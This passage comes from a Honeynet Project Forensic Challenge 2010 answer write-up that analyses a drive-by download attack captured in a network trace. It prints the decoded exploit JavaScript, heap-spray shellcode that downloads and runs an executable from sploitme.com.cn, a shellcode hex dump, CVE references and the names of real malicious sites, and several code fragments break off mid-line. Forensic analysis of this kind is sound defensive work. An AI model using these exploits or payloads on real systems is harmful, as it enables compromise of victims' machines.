3187191201159151129163160188161188184154193138140197157158150222204213134165156117179210213215173169144165166183180165184220152125168182161188163214201163135199166121187162187191135102181176179206214194185161129149167183191181205218127105160184160189180218193163128186165158186224 1811871691761801771372092121771891691441691201191772241842111531231521151711731882181921631401301571542042242051541271601561881902112031931771711541701481251902232262071511631971771461852302282011631201901651421872301961901061021581771492092141751731011541541411831902241921511431 3718517717115122221320312415719214313917022618515413117118113815721620419315216115219214818820016419215113414216411517021022221120314113619014213820122519619016116417913915221119017417216513313314518820018519221814314113117516921119522320210314013014815918316220521216115918215515 3209189173203175154154175186191197205218127104164179170152180221192141161136165180158231196187168164157151187208212156181102152169153188201181159208151104164120147210184225202124140199157140179225203190173161157139149218213177189168144169116179199224187215132105160175171171196218 2011401402001671591822251792121351721711181572172041931561011301911671792011831922181431411311751692111961732041381621891421382012362042121231731791541612222031931521611282031741882001651802091261221301701451512342131921411191361431921572241852241261691591891362201911732101081561 6914517520118518421412812516717917215216316320514110318815615918322020317015716215715518715818121518117115216517018318016515417814316416818416015219621820110310618515612115823018117016110918213914515421515719315715318713318919022321716014312513917317118816321420116313519915612217 5222195191135162164154191209212193189170154149170181199164180216143141160115145222221161193124111188167158150222204213134171171176128208215189156157153154133179199223188171150125190182161168218224192162165194146121158219203208106176172155153167214178185174151169141120201185191214 1271041601821601891922282001401351921431382012202041751311661721351831711952281841011321511451381792191542251351381821371471851951581811591391981481771711821832241011731641361561521912131891241312041751381781621952131281381981791612062182241921621651941681221912182052081191761791 3814921920417718811015416912017920016418420715212516717814420620015518417511920414419218716318517212610416013415715019122816810113114915312017818318315413212116811614916917915818415814013114614017423318722413910315915214815219117318910213315114113718318119215213012218511615016820 0155180121162152148176187163184171118106163172157150193175184175132149153120179162183151130121168116149185217158184158140131145178170236187224139103160152140149192173189102136166141140178197192152135138155188152206200155185138131134148176187163184172143124163172157150192190176102 1351651531201831991751551301751681161501692211551811581401311441391821631841861391031601511701501922111891021322041441231822191921521321231551891522222001551801751311331451381871631831711301051611341571501921901931241312031531201792361951551341591681161481691912271801201401311441 9317918518322413910316013517916919318918910213215013612017818119215213017616013315316820015518017514415314917618716318721013817316417215715019117418017313214915312018322017922513212116811614816921715718112014013114811919118218318613910315913514822019617318910213215013314218219719 2152135139172137152206200155180101127131146138187163184225139125161134157150192191189123132165153120179182195155134159168116148169191227181120140131145177191182183224139103159136148153195211189102133151140119180181192152130139159116149206200155185121131201144192187163183171134106 1631721571501911741801051351651531201791991961711301751681161491851791551851361401311461401831821832241391031591351741521961731891021321661401201792351921521301761601341501682001551821221241501481541871631881871561031631721571501962131931191311871531201832211961741351591681161522 2317922818015814013114917720016618720813910316315215717219121118910213518817011918321919215213016116711714918420015518117515713214515418716318420914312016317215715019221219210613314915312018222017216913415916811615017018315618417414013114615520518418317013910316017317415019117318 9102132189152121183219192152131160163188153184200155181175139132146138187163184210130105159172157150192190184103136149153120180183192170132121168116148170199154185136140131149178191184187224139103159135152150192189189102132166132124178235192152134176147189148222200155181137119131 1441381871631851721261031601721571501911741841021321651531201822361791551301751681161501691911571851581401311441931711821832081391031601511361501912111891021312041571381801811921521301611711871521842001551851601431331441381871631831711341031601501571501912281801021351871531201791 9820617413515916811615220721715518115814013114917818616718517013910315913615615319518918910213216615314218321919215213113818118614916820015518513814414914613818716318818711912216415015715019621319210313114915312017818218715213113716811614922319515618212014013114519316616518417013 9103159174160223195189189102132204144192183219192152131161159118148168200155181159161132149176187163184210134105160134157150191213188103132165153120179221195153130175168116148208199156185120140131145178186164183224139103160173160222196211189102131189156121179235192152131161171117 1522222001551811591351321441541871631842251181751641501571501922281681031331491531201792201912251351591681161482232132281851201271941461221912182052081191651711771481581911782061731311501321901781821711581531631521881441731922282021751031931561811782301811751311651711171282082041 8915616814416912018120118520921613015919718617216919115817813717013215615917421720317412611115713513715319117718017214320413317717818518321915012515618914618417121719216313113716718017123517917410210718217614122219419418917014417014517719020217221112812115517517118518017418012213 1190167155167182183172130159157151187151203194176156153133144128199202214153142142155122171151218218201124139193166122178231204174139171172118153212189212176109153133145193176202222225152175197124170152191161205134166204166193150236205224106176182154145223214178177165152191166182 1781812262251521051591851482062211612031621242031401421491712042121391051551361412222132151731061291491741261912231632241281261721711702061802181831371191371641552212251952091691661571881862132151561521511511681151282001651832171521041861731691511962141821041021571671801712351791 7516411116615414114921117315615914416917518617618217215513012515918616022318021218012413119414612221217119617411016018215412020921221618417015313214519219820217215115210319718615918416721220216214018616714218718220415310610218117612821619921517317014413215218217619715921814314113 5177171172217161205141103188156159183220203170157162157155187158181216181172153191153175191186184214143141168115146168221161205134166191167158154220206174161172180172137223213178177161143169149193198185192211153121185179172152196227204141170132156159174217204153127167181118137222 2041931731601341691201792012351721691421051641791712102001951871031281951571581791621811701531341681151482211911731561371531541411791902011882251501251681751711682132181821041031881561591832202031701571621571551871581812152111621291531241761982241842221521631681711611682221612031 2512813516812219121820520811917617913815721621217718117114415315212820120115921115210416017117017219921717615814013114819316623618322413910316113614415119217318910213120413211917818119215213012315911815016820015518112111913414817618716318517212617316318815715019119118010413114915 3120180183180169135121168116148169217155182120140131144139209184187208139103160135136153195211189102133151148193179181192152131102159115148168200155181137157134148176187163184210122176163188157150192191172101132149153120183198180172130137168116153185187227184158140131149156178166 1872081391031601361611711952111891021321661401201821971921521351391511191482222001551821211611311451761871631831711341031601501571501921902021021321871531201792361831551341591681161501701872281841741401311441931781651841701391031591351481521931731891021321661571421782351921521311 7617111915220620015518012113120314413818716318322513112515918815715019217421112113316515312017918217515213012116811614822319217218512014013114419319118518820813910316317415622019621118910213115014419117918119215213516015518915016820015518012115713314513818716318715114312215915015 7150191174180172136149153120179182172174134137168116153186204176184158140131144119174163185170139103160189157172193173189102132167153141179197192152131122171119152206200155180121131203145138187163184209143122159188157150191175180105135187153120180183179151132121168116148186191155 1811581401311491391782331832241391031591351521531952111891021311501441231821971921521311391721351482222001551811371191311491541871631851721351221591881571501911742061041361491531201791981791521311751681161482231921731821201401311461401711821871861391031641511741501952111891021361 8915713717821919215213516117213815320620015518417511920414417618716318820915210616317215715019519118912413118715312018222020915113515916811614820819915618113614013114519320416418418613910316017316116719521118910213218815612418018119215213416014813315220620015518212212313214819218 7163185187157124159134157150192212206102131149153120179221191153135159168116149207195227185136140131145193186164185170139103160174148152191211189102132166148121183181192152132123168134150168200155180122139130149154187163188210143124163188157150191174184102132165153120179198171156 1301751681161522231792281801741401311451551661631831701391031611361441501922111891021311501481201791971921521341761551191482222001551821211311331491761871631832251231221591721571501921901681021311871531201782361961701321211681161482082032261841361401311491781901651831701391031591 3515215019218918910213120414412018221919215213113818213815320620015518415915713114517618716318821013810716113415715019117518810513516515312017919819217413515916811614918521322518112014013114915619118118517013910316415113716919618918910213618915612117818119215213012216311614918420 0155181175135132146138187163184225118105160134157150191213192175135165153120179236183224135159168116149208191157180120140131145177208164188208139103160174152152192173189102131189152121179197192152131161171117148222200155180160139132149138187163184210138104159188157150192212192174 1361871531201782211951531311751681161492082031561841741401311451771821641831861391031601891362221961891891021322041321211801811921521311601671891532062001551801751572041491381742261851541431581811721372052132161771571551661161881912022052061341421561881601892212171781371701321561 5917421720417513011115913917415319119016817213114911518220016421021115112520217316915119621417916217419016518020116220317016417515715118715120319417615614319117518119022322622114210419712417118816721420210313218616614218622517920813910315913814422020322718910213115314019018223517 9215132105182178168188234214178124128194157121175229204153131168158176191209212215203101151150187186200235162224128142198172168188214211201124111188164192216171195212161164171176191219203156218108156163179121190202179206151125185124160210222216192162174200156121216231205154139159 1811181532222111931561631291501321861991861832211301591891221611722002211931411361901401421752261961531271691801171492151931561931711531871711211902021792061501381301861501512211621801251571351461542122351851531601681571881791562031941771741431701751691982001541601511251851811691 7221722020210315819016514222122020415313516216111811917619515616016815215315317720118320620715216315617116115119921717813717013215615917421720415312716718111813722220419317316013416912017920123517216914210516417917121020019518710312819515715817916218117012713416811514822119117315 6137153154141179190201188225150125168175171168187218182103139139165180187165179172123175181176141154189173210108144165120190201202184214128122151179150151199223202125140204164138204235181187169162158177137150213156206164131149174126191197159222153142160178146173214218201162136200 1671922081691962121101751571381781581911742191651341531521881991851922201431051641781501512212201781741621371571801582351811741641111591351872141941741721721331321781851762352141581531261561201721511712112001631322011661801872181961701061241821761412162141931731011441651711791881 6421420312813819812416015118415419210315719315715420916920819110211114917717121321221518517115420312019320118517615115314215912416118722922819113616918714017721722320415412616517917311922019315621410913116613212619821922121712814219811517021122216120110312819516612216723519619012 3161158176120223196177173101143168145189201202180209143139139172168210200212203120158190154193179214181187169111171117141149203156206164144165175126203202155160142104152115160151217217193136162137169159149189187153110170181138191209214177188164129166183128168223155210142141159178

146185229167')); Decoded & decrypted function Complete(){setTimeout('location.href = "about:blank',2000);} function CheckIP(){var req=null;try{req=new ActiveXObject("Msxml2.XMLHTTP");}catch(e) {try{req=new ActiveXObject("Microsoft.XMLHTTP");}catch(e){try{req=new XMLHttpRequest();}catch (e){}}} if(req==null)return"0";req.open("GET","/fg/show.php? get_ajax=1&r="+Math.random(),false);req.send(null);if(req.responseText=="1"){return true;}els e{return false;}} var urltofile='http://sploitme.com.cn/fg/load.php?e=1';var filename='update.exe';function Cre ateO(o,n){var r=null;try{r=o.CreateObject(n)}catch(e){} The work is licensed under a Creative Commons License. Copyright © The Honeynet Project, 2010 Page 8 of 18 T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

if(!r){try{r=o.CreateObject(n,'')}catch(e){}} if(!r){try{r=o.CreateObject(n,'','')}catch(e){}} if(!r){try{r=o.GetObject('',n)}catch(e){}} if(!r){try{r=o.GetObject(n,'')}catch(e){}} if(!r){try{r=o.GetObject(n)}catch(e){}} return r;} function Go(a){var s=CreateO(a,'WScript.Shell');var o=CreateO(a,'ADODB.Stream');var e=s.Envir onment('Process');var xhr=null;var bin=e.Item('TEMP')+'\\'+filename;try{xhr=new XMLHttpReques t();} catch(e){try{xhr=new ActiveXObject('Microsoft.XMLHTTP');} catch(e){xhr=new ActiveXObject('MSXML2.ServerXMLHTTP');}} if(!xhr)return(0);xhr.open('GET',urltofile,false) xhr.send(null);var filecontent=xhr.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(fileconten t);o.SaveToFile(bin,2);s.Run(bin,0);} function mdac(){var i=0;var objects=new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96 C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0 000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc 1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D} ','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA01859 9-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b- -B050-6C07C962476B}',null);while(objects[i]){var a=null;if(objects[i].substring(0,1)=='{') {a=document.createElement('object');a.setAttribute('classid','clsid:'+objects[i].substring(1, objects[i].length-1));}else{try{a=new ActiveXObject(objects[i]);}catch(e){}} if(a){try{var b=CreateO(a,'WScript.Shell');if(b){if(Go(a)){if(CheckIP()) {Complete();}else{aolwinamp();} return true;}}}catch(e){}} i++;} aolwinamp();} function aolwinamp(){try{var obj=document.createElement('object');document.body.appendChild(o bj);obj.id='IWinAmpActiveX';obj.width='1';obj.height='1';obj.data='./directshow.php';obj.clas sid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B %u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C %u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B %u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F %u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC %u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE %uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u333D");var bi gblock=unescape("%u0c0c%u0c0c");var headersize=20;var slackspace=headersize+shellcode.length; while(bigblock.length');document.write('bof=string(1400,unescape("%ff" )) + string(1000,unescape("%0c"))');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1' );document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');document.write('IWinAmpActiveX.C onvertFile bof,1,1,1,1,1');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');documen t.write('');}catch(e){} directshow();} function directshow(){var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B %u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B %u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B %u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB %u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F %u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F %u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u343D");var bigblock=unescape("%u9090%u9090"); var headersize=20;var slackspace=headersize+shellcode.length;while(bigblock.length

Judging by the sheer amount of code around here, I'm sure you're real glad to have asked this question. 

Question 7. On the malicious URLs at what do you think the variable 's' refers to? List the differ- Possible Points: 2pts ences. Tools Used: None Answer 7.

S is for source. It designates the landing site. It exists either for collecting arrival statistics, or for serving different exploits based on the victim arrival path (as we have here).

Landing site #1 – s=3feb5a6b2f Landing site #2 – s=84c090bd86 The work is licensed under a Creative Commons License. Copyright © The Honeynet Project, 2010 Page 10 of 18 T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

Question 8. Which operating system was targeted by the attacks? Which software? And which vul- Possible Points: 4pts nerabilities? Could the attacks been prevented? Tools Used: Wireshark, p0f, Google Answer 8.

The attacks target ActiveX objects running in Internet Explorer 6/7, running on 32-bit Microsoft Windows XP.

 Client #1 is using Firefox 3.5.3 on Windows XP and was not attacked.  Clients #2 and #3 are using Internet Explorer 6 on Windows XP. Both were successfully attacked.  Client #4 claims to be running Firefox 0.8 on Linux (0.8? that's so 2004!) but by its SMB announcements (and, ap- parently, by the exact form of its HTTP requests – so p0f says) is running Windows XP as well.

The following six vulnerabilities are targeted.

Exploit Vulnerable Component Published Reference Remedy Links I MDAC RDS.Dataspace ActiveX control Apr 2006 CVE-2006-0003 MSB-MS06-014 [1-2] II AOL IWinAmpActiveX control (AmpX.dll) 4 OSVDB- (none) [3] May 2009 54706 III DirectShow ActiveX control (msvidctl.dll) Jul 2009 CVE-2008-0015 MSB-MS09-032 5 [4] IV Office Snapshot Viewer ActiveX control Jul 2008 CVE-2008-2463 MSB-MS08-041 [5-6] V COM Object Instantiation (msdds.dll) Aug 2005 CVE-2005-2127 MSB-MS05-052 [7-8] VI Office Web Components ActiveX control Jul 2009 CVE-2009-1136 MSB-MS09-043 [9-10]

Except for the AOL one, all have been fixed by patches issued via Windows Update; therefore, installing these would have prevented the attack on any computer that does not have AOL radio installed.

1. http://www.metasploit.com/modules/exploit/windows/browser/ie_createobject 2. http://www.milw0rm.com/exploits/2164 3. http://www.metasploit.com/modules/exploit/windows/browser/aol_ampx_convertfile 4. http://www.metasploit.com/modules/exploit/windows/browser/msvidctl_mpeg2 5. http://www.metasploit.com/modules/exploit/windows/browser/ms08_041_snapshotviewer 6. http://www.milw0rm.com/exploits/6124 7. http://www.securitytracker.com/alerts/2005/Aug/1014727.html 8. http://www.frsirt.com/exploits/20050817.IE-Msddsdll-0day.php (broken link) 9. http://www.metasploit.com/modules/exploit/windows/browser/owc_spreadsheet_msdso 10. http://www.milw0rm.com/exploits/9224

4 This exploit seems to be using the wrong CLSID (same as in exploit III), either by mistake or as a method to bypass current countermeasures. Since the exploit succeeds for client #3, the latter is correct. 5 This update just sets a killbit; the real fix was carried out in MSB-MS09-037. The work is licensed under a Creative Commons License. Copyright © The Honeynet Project, 2010 Page 12 of 18 T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

Question 9. What actions does the shellcodes perform? Please list the shellcodes (+md5 of the bina- Possible Points: 8pts ries). What's the difference between them? Tools Used: OllyDbg, Google, calc.exe6 Answer 9.

All shellcodes are based on one generic x86 shellcode that downloads an executable from a webserver (URL can vary) to a local temporary file and executes it (see pseudocode below). The differences lie in the actual URL embedded in the shellcode.

Exploit URL Shellcode MD5 checksum I http://sploitme.com.cn/fg/load.php?e=1 (no shellcode involved) II http://sploitme.com.cn/fg/load.php?e=3 41D013AE668CEEE5EE4402BCEA7933CE III http://sploitme.com.cn/fg/load.php?e=4 1DACF1FBF175FE5361B8601E40DEB7F0 IV http://sploitme.com.cn/fg/load.php?e=6 (no shellcode involved) V http://sploitme.com.cn/fg/load.php?e=7 22BED6879E586F9858DEB74F61B54DE4 VI http://sploitme.com.cn/fg/load.php?e=8 9167201943CC4524D5FC59D57AF6BCA6 Note that the webserver always sends the same malware, but it can tell which exploit was successful by the extra parameter. (Where are exploits 2 and 5? see Appendix B)

Here is the hex-dump of the shellcode for exploit V. 00000000h: 33 C0 64 8B 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 00000010h: 58 08 EB 09 8B 40 34 8D 40 7C 8B 58 3C 6A 44 5A 00000020h: D1 E2 2B E2 8B EC EB 4F 5A 52 83 EA 56 89 55 04 00000030h: 56 57 8B 73 3C 8B 74 33 78 03 F3 56 8B 76 20 03 00000040h: F3 33 C9 49 50 41 AD 33 FF 36 0F BE 14 03 38 F2 00000050h: 74 08 C1 CF 0D 03 FA 40 EB EF 58 3B F8 75 E5 5E 00000060h: 8B 46 24 03 C3 66 8B 0C 48 8B 56 1C 03 D3 8B 04 00000070h: 8A 03 C3 5F 5E 50 C3 8D 7D 08 57 52 B8 33 CA 8A 00000080h: 5B E8 A2 FF FF FF 32 C0 8B F7 F2 AE 4F B8 65 2E 00000090h: 65 78 AB 66 98 66 AB B0 6C 8A E0 98 50 68 6F 6E 000000a0h: 2E 64 68 75 72 6C 6D 54 B8 8E 4E 0E EC FF 55 04 000000b0h: 93 50 33 C0 50 50 56 8B 55 04 83 C2 7F 83 C2 31 000000c0h: 52 50 B8 36 1A 2F 70 FF 55 04 5B 33 FF 57 56 B8 000000d0h: 98 FE 8A 0E FF 55 04 57 B8 EF CE E0 60 FF 55 04 000000e0h: 68 74 74 70 3A 2F 2F 73 70 6C 6F 69 74 6D 65 2E ; http://sploitme. 000000f0h: 63 6F 6D 2E 63 6E 2F 66 67 2F 6C 6F 61 64 2E 70 ; com.cn/fg/load.p 00000100h: 68 70 3F 65 3D 37 ; hp?e=7

The following C pseudocode describes what the shellcode does. const char url[] = "http://sploitme.com.cn/fg/load.php?e=7"; char tmpfile[]; kernel32.GetTempPathA(tmpfile, 136); strcat(tmpfile, "e.exe"); kernel32.LoadLibraryA("urlmon.dll"); urlmon.DownloadURLToFileA(NULL, url, tmpfile, 0, NULL); kernel32.WinExec(tmpfile, SW_HIDE); // No window shown kernel32.ExitThread(0);

System calls are resolved by a procedure that walks the export name table of a given DLL (here, either kernel32.dll or urlmon.dll) and looks for a match. Instead of string comparison, it looks for a match between a CRC-style hash of the function name and a 32-bit constant.

For a discussion of a similar shellcode, see http://www.cs.ucsb.edu/~marco/blog/2008/06/javascript-attack-part-ii.html.

6 I injected the shellcode to a running calc.exe process and traced it with OllyDbg  The work is licensed under a Creative Commons License. Copyright © The Honeynet Project, 2010 Page 13 of 18 T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

Question 10. Was there malware involved? What is the purpose of the malware(s)? (We are not look- Possible Points: 4pts ing for a detailed malware analysis for this challenge) Tools Used: IDA, MSDN Answer 10.

Yes, the main purpose of the entire attack is to make the client download an executable from the malware distribution webserver and locally execute it.

In real-life situation, the malware would probably be enlisting the victim computer in a bot-net; in this challenge, however, the "malware" is actually a harmless program that loads a URL (namely, www.honeynet.org) via Internet Explorer.

It was compiled by mingw-gcc 3.4.5 and does not employ any obfuscation or anti-debugging tricks. Here is its approximate C sourcecode.

#define SIZE 0x200; char *read_url_from_end_of_self() { const char magic[] = "urlretriever|"; char fname[FILENAME_MAX], buf[SIZE]; HANDLE hFile; DWORD num_bytes_read;

GetModuleFileName(GetModuleHandle(NULL), fname, sizeof(fname));

hFile = CreateFile(fname,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL); if (!hFile) return NULL; if (-1 == SetFilePointer(hFile, - SIZE, 0, SEEK_END)) return NULL; if (!ReadFile(hFile, buf, SIZE, &num_bytes_read, NULL)) return NULL; CloseHandle(hFile);

if (strncmp(buf,magic,sizeof(magic))) return NULL;

return strdup(&buf[sizeof(magic)]) }

BOOL launch_IE(char *url) { const char IE_cmdline[] = "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" \"%s\"'"; char cmdline[1000]; UINT result;

sprintf(cmdline, IE_cmdline, url); result = WinExec(cmdline, SW_SHOW); return (result <= ERROR_GEN_FAILURE); } int main() { char *url = read_url_from_end_of_self(); if ( ! url) return -1; if (launch_IE(url)) { const char caption[] = "Starting IE"; char errmsg[256]; FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), LANG_NEUTRAL, errmsg, sizeof(errmsg)) MessageBox(NULL, errmsg, caption); return -2; } free(url); return 0; }

Bonus UXVlc3Rpb24gQm9udXMgKGZvciBmdW4pLiBBZGRpdGlvbmFsIDEgcG9pbnQgZm9yOiAKV2hh dCBjYW4geW91IHRlbGwgYWJvdXQgZGF0ZXMvdGltZT8gQW55dGhpbmcgd3Jvbmc/IENhbiB5 b3UgcHJvcG9zZSBhIHBsYXVzaWJsZSBleHBsYW5hdGlvbj8KRG8geW91IHRoaW5rIHRoYXQg dGhlIG5ldHdvcmsgY2FwdHVyZSAocGNhcCkgd2FzIG1hZGUgb24gYSBsaXZlIGVudmlyb25t ZW50PyAK Tools Used: Python, Wireshark, Excel Answer

Decoded base64 (using python) – Question Bonus (for fun). Additional 1 point for: What can you tell about dates/time? Anything wrong? Can you propose a plausible explanation? Do you think that the network capture (pcap) was made on a live environment?

Uptime analysis All clients report uptime during SMB browser announcements. Although the broadcast is repeated 4 times in one second in- crements, the same uptime is reported, so I assume the system uptime clock is queried only once.

I compared the time at which the first announcement packet is sent with the reported uptime. For independent clients, we expect totally different uptime, so these should be uncorrelated. However, the following graph shows clearly that one is a linear function of the other, with line slope ~1.37 and additive constant ~179 seconds.

In a live VM environment where all clients are started in the same time, one would expect the line slope to be exactly one, but here the computer uptime increases 37% faster than the packet time. Weird.

Webserver date and time analysis By webserver HTTP responses, the network capture can be dated to begin at Tuesday, February 2nd, 2010 at 19:05:04 GMT. Moreover, all three 192.168.56.x servers have synchronized clocks, which are also synchronized with the capture clock (and the clock of 64.236.114.1). This probably means these all run on the same machine, also making the network capture.

Semi-plausible explanation: the machine running malicious servers' VMs is so overloaded that it runs slower than the other machine, running clients' VMs 

Appendix A A Python script to decrypt&decode var CRYPT=… obfuscated javascript. #!/usr/bin/python import sys,re src = open(sys.argv[1]).read() pwd = re.search(r"signature:'(\w+)'", src).group(1) m = len(pwd) cipher = re.search(r"CRYPT.obfuscate\('(\d+)'", src).group(1) n = len(cipher)/3 tmp = "".join(chr(int(cipher[3*i:3*i+3])-ord(pwd[i%m])) for i in xrange(n)) plain = tmp.decode('utf8').decode('base64') open(sys.argv[1] + '.js', 'wt').write(plain)

Appendix B Real malicious sites When googling to trace the origin of the var CRYPT=… encryption, I came across several sites using the same javascript obfuscation methods, the same exploits and shellcodes. I guess you based the challenge on these   3k70.cn  clubp.yo-yoo.co.il/forum/cache/negr/

Here are the "missing" exploits (based on the …/load.php?e=X parameter). function pdf(){var isInstalled=false;if(navigator.plugins&&navigator.plugins.length){for(var x=0;x

function pIrfuYewQ(){function fix_it(yarsp,len){while(yarsp.length*2

Exploit Vulnerable Component Published Reference Remedy Links VII Adobe PDF Collab.collectEmailInfo() Feb. 2008 CVE-2007-5659 Reader >=8.1.2 [1] VIII Adobe PDF util.printf() function Nov. 2008 CVE-2008-2992 Reader >=8.1.3 [2] IX Adobe PDF Collab.getIcon() Mar. 2009 CVE-2009-0927 Reader >=9.1 [3] X Internet Explorer 7 uninitialized memory Feb. 2009 CVE-2009-0075 MSB-MS09-002 [4]

1. http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_collectemailinfo 2. http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_geticon 3. http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_utilprintf

4. http://www.metasploit.com/modules/exploit/windows/browser/ms09_002_memory_corruption